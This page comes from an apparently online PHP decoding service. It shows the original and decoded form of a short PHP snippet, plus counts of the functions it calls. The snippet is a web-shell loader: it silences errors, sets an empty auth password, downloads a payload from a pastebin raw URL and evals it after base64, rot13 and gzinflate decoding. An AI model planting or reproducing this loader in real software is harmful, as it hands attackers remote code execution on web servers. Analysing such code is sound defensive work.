Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php @ini_set('output_buffering',0); @ini_set('display_errors', 0); $auth_pass = ""; $hy..
Decoded Output download
<?php
@ini_set('output_buffering',0);
@ini_set('display_errors', 0);
$auth_pass = "";
$hythan= file_get_contents('http://pastebin.com/raw/Qu7ZKGeq');
eval(str_rot13(gzinflate(str_rot13(base64_decode(($hythan))))));
?>
Did this file decode correctly?
Original Code
<?php
@ini_set('output_buffering',0);
@ini_set('display_errors', 0);
$auth_pass = "";
$hythan= file_get_contents('http://pastebin.com/raw/Qu7ZKGeq');
eval(str_rot13(gzinflate(str_rot13(base64_decode(($hythan))))));
?>
Function Calls
| ini_set | 2 |
| gzinflate | 1 |
| str_rot13 | 1 |
| base64_decode | 1 |
| file_get_contents | 1 |
Stats
| MD5 | ef0260328b07e557252c34fc9bef9451 |
| Eval Count | 0 |
| Decode Time | 103 ms |